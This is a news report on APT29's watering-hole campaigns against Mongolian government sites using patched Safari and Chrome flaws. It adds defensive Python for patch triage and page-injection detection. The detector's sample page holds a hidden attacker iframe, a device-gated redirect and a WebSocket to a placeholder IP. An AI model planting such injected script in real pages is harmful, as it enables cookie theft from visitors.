Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack

Aug 29, 2024 | Ravie Lakshmanan | Browser Security / Vulnerability

Cybersecurity researchers have flagged several in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.

“These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices,” Google Threat Analysis Group (TAG) researcher Clement Lecigne said in a report shared with The Hacker News.

The activity, observed between November 2023 and July 2024, is notable for delivering the exploits through a watering hole attack on two Mongolian government websites, cabinet.gov[.]mn and mfa.gov[.]mn.

The intrusion set has been attributed with moderate confidence to a Russian state-backed threat actor codenamed APT29 (aka Midnight Blizzard), with parallels observed between the exploits used in the campaigns and those previously linked to commercial surveillance vendors (CSVs) Intellexa and NSO Group, indicating exploit reuse.

The vulnerabilities at the heart of the campaigns are listed below –

  • CVE-2023-41993 – A WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (Fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)
  • CVE-2024-4671 – A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)
  • CVE-2024-5274 – A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)
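Because all three bugs are n-days, the practical question for a defender is which devices still run a build older than the fixes listed above. The Python script below is an added example, not tooling from Google TAG or The Hacker News: it turns the fixed versions quoted in the list into a minimum-version check and runs it over an inventory of user-agent strings. The hostnames and user-agent strings in it are constructed, and the Chrome thresholds are the desktop builds the article quotes, so results for Android Chrome should be confirmed against Google's Android release notes.

```python
# Added example (not code from Google TAG or The Hacker News): check whether a
# reported browser build still predates the fixes the article lists, so an
# inventory of user-agent strings can be triaged for n-day exposure.
# Hostnames and user-agent strings below are constructed sample data.
import re

# First fixed version per product, taken from the article's patch notes.
# Chrome shipped paired builds (.201/.202 and .112/.113) on Windows/macOS; the
# lower number of each pair is the threshold. The article quotes desktop
# builds only, so treat Android Chrome results as indicative and confirm them
# against the Android release notes.
FIXED_IN = {
    "CVE-2023-41993": {"ios": "16.7", "safari": "16.6.1"},
    "CVE-2024-4671": {"chrome": "124.0.6367.201"},
    "CVE-2024-5274": {"chrome": "125.0.6422.112"},
}


def parse_version(text):
    """'125.0.6422.76' -> (125, 0, 6422, 76); shorter strings are zero-padded."""
    parts = tuple(int(p) for p in text.strip().split("."))
    return parts + (0,) * (4 - len(parts))


def exposed_to(product, version):
    """CVEs from FIXED_IN that this product/version has not yet received a fix for."""
    product = product.lower()
    if product not in {"chrome", "ios", "safari"}:
        raise ValueError(f"no patch data on this page for {product!r}")
    have = parse_version(version)
    return [cve for cve, fixes in FIXED_IN.items()
            if product in fixes and have < parse_version(fixes[product])]


def classify_user_agent(ua):
    """Map a UA string to (product, version), or None if it is not a product we track.
    iOS is checked first: every iOS browser (Chrome's 'CriOS' included) runs the
    system WebKit, so the OS version is what matters for CVE-2023-41993."""
    m = re.search(r"CPU (?:iPhone )?OS (\d+(?:_\d+)*)", ua)
    if m:
        return ("ios", m.group(1).replace("_", "."))
    # Other Chromium browsers (Edge, Brave, ...) also carry a Chrome/ token but
    # ship fixes on their own schedule; this example treats them all as Chrome.
    m = re.search(r"\bChrome/(\d+(?:\.\d+)*)", ua)
    if m:
        return ("chrome", m.group(1))
    m = re.search(r"\bVersion/(\d+(?:\.\d+)*).*\bSafari/", ua)
    if m:
        return ("safari", m.group(1))
    return None


def triage(inventory):
    """{host: [cves]} for every host; None marks a UA this example cannot classify."""
    report = {}
    for host, ua in inventory:
        hit = classify_user_agent(ua)
        report[host] = exposed_to(*hit) if hit else None
    return report


# Constructed inventory: (hostname, user-agent) pairs.
SAMPLE_INVENTORY = [
    ("win-01", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36"),
    ("lnx-02", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.76 Safari/537.36"),
    ("mac-03", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"),
    ("ios-04", "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"),
    ("ipad-05", "Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1"),
    ("and-06", "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.64 Mobile Safari/537.36"),
    ("ffx-07", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"),
]

if __name__ == "__main__":
    for host, cves in triage(SAMPLE_INVENTORY).items():
        print(host, "unclassified" if cves is None else (", ".join(cves) or "patched"))
```

The version tuple comparison is what makes the check honest: `125.0.6422.76` is newer than the CVE-2024-4671 fix but older than the CVE-2024-5274 fix, so it is reported as exposed to exactly one of the two Chrome bugs. Products the article gives no fix data for raise rather than silently passing, so an unrecognised browser is never reported as patched.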

The November 2023 and February 2024 campaigns are said to have involved the compromise of the two Mongolian government websites – both in the first and only mfa.gov[.]mn in the latter – to deliver an exploit for CVE-2023-41993 via a malicious iframe component pointing to an actor-controlled domain.

“When visited with an iPhone or iPad device, the watering hole sites used an iframe to serve a reconnaissance payload, which performed validation checks before ultimately downloading and deploying another payload with the WebKit exploit to exfiltrate browser cookies from the device,” Google said.

The payload is a cookie stealer framework that Google TAG previously detailed in connection with the 2021 exploitation of an iOS zero-day (CVE-2021-1879) to harvest authentication cookies from several popular websites, including Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and send them via WebSocket to an attacker-controlled IP address.

“The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated,” Google noted at the time, adding “attackers used LinkedIn messaging to target government officials from western European countries by sending them malicious links.”

The fact that the cookie stealer module also singles out the website “webmail.mfa.gov[.]mn” suggests that Mongolian government employees were a likely target of the iOS campaign.

The mfa.gov[.]mn website was infected a third time in July 2024 to inject JavaScript code that redirected Android users running Chrome to a malicious link, which served an exploit chain combining the flaws CVE-2024-5274 and CVE-2024-4671 to deploy a browser information-stealing payload.
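The three injections described above (an iframe to an actor-controlled domain, JavaScript that inspects the user agent before redirecting Android Chrome users, and cookie exfiltration over WebSocket to an attacker IP) are all visible in the HTML a compromised site serves, which is why a periodic page-integrity check is a practical watering-hole control for site owners. The Python script below is an added example, not Google TAG's tooling: it parses a fetched page and flags each of those patterns. The site host ministry.example, the domain attacker.example and the address 203.0.113.10 are constructed placeholders, not indicators from the campaign.

```python
# Added example (not Google TAG tooling): triage a fetched HTML page for the
# injection patterns the article describes on the compromised sites, namely an
# <iframe> that points off-origin, an inline script that tests
# navigator.userAgent and then redirects, and a WebSocket opened to a raw IP.
# The host names, the attacker domain and the sample pages are constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

UA_CHECK = re.compile(r"navigator\.userAgent")
# Assignment to location or a call to replace()/assign(); a comparison such as
# 'location.href == x' does not match, a plain assignment does.
REDIRECT = re.compile(r"location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\s*\(")
URL_LITERAL = re.compile(r"https?://[^\s'\"()<>]+")
WS_TO_IP = re.compile(r"wss?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?")


class _Collector(HTMLParser):
    """Gathers iframe/script src attributes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes, self.script_srcs, self.inline = [], [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def is_off_origin(url, page_host):
    """True when url names a host other than the page's own. Relative URLs have
    no host and stay on-origin; protocol-relative '//host/x' does carry a host."""
    host = urlsplit(url).hostname
    return host is not None and host.lower() != page_host.lower()


def triage_page(html, page_host):
    """Return a list of (indicator, detail) tuples, empty for a page with no hits."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for src in c.iframes:
        if is_off_origin(src, page_host):
            findings.append(("off-origin-iframe", src))
    for src in c.script_srcs:
        if is_off_origin(src, page_host):
            findings.append(("off-origin-script", src))
    for body in c.inline:
        if UA_CHECK.search(body) and REDIRECT.search(body):
            m = URL_LITERAL.search(body)
            findings.append(("ua-gated-redirect", m.group(0) if m else None))
        for m in WS_TO_IP.finditer(body):
            findings.append(("websocket-to-ip", m.group(0)))
    return findings


PAGE_HOST = "ministry.example"  # constructed stand-in for the watering-hole site

# Constructed: a benign page that reads navigator.userAgent without redirecting.
CLEAN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><iframe src="/embed/news"></iframe>
<iframe src="//ministry.example/calendar"></iframe>
<script>document.getElementById("ua").textContent = navigator.userAgent;</script>
</body></html>"""

# Constructed: the same site carrying the three injected elements. The domain
# attacker.example and the address 203.0.113.10 are placeholders, not IOCs.
INJECTED_PAGE = """<html><body><p>Press releases</p>
<iframe src="https://cdn.attacker.example/loader.html" style="display:none"></iframe>
<script>
if (/Android/.test(navigator.userAgent) && navigator.userAgent.indexOf("Chrome") !== -1) {
  location.href = "https://cdn.attacker.example/chain.html";
}
</script>
<script>var ws = new WebSocket("ws://203.0.113.10:8080/c");</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, triage_page(page, PAGE_HOST) or "no indicators")
```

Run from a scheduled job that fetches the live page and diffs the findings against a known-good baseline, this is a minimal integrity monitor. One caveat that follows directly from the article: the injected code gated on the visitor's device, and the reconnaissance stage ran "validation checks" before delivering anything further, so a check that fetches only with a desktop user agent may never see the malicious branch execute. Fetch the page with the user agents of the populations you care about (here, Android Chrome and iOS Safari), and remember that the iframe and redirect are the visible part; what the actor-controlled domain returns can change per visitor.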

Specifically, the attack sequence uses CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to escape the sandbox, ultimately making it possible to break out of Chrome's site isolation protections and deliver the stealer malware.

“This campaign delivers a simple binary deleting all Chrome Crash reports and exfiltrating the following Chrome databases back to the track-adv[.]com server – similar to the basic final payload seen in the earlier iOS campaigns,” Google TAG noted.

The tech giant further said the exploits used in the November 2023 watering hole attack and by Intellexa in September 2023 share the same trigger code, a pattern also observed in the triggers for CVE-2024-5274 used in the July 2024 watering hole attack and by NSO Group in May 2024.

What's more, the exploit for CVE-2024-4671 is said to share similarities with a previous Chrome sandbox escape that Intellexa was discovered using in the wild in connection with another Chrome flaw, CVE-2021-37973, which was addressed by Google in September 2021.

While it is currently not clear how the attackers managed to acquire the exploits for the three flaws, the findings make it amply clear that nation-state actors are using n-day exploits that were originally used as zero-days by CSVs.

It does, however, raise the possibility that the exploits may have been procured from a vulnerability broker who previously sold them to the spyware vendors as zero-days, a steady supply of which keeps the ball rolling as Apple and Google shore up their defenses.

“Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices,” the researchers said. “Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers.”
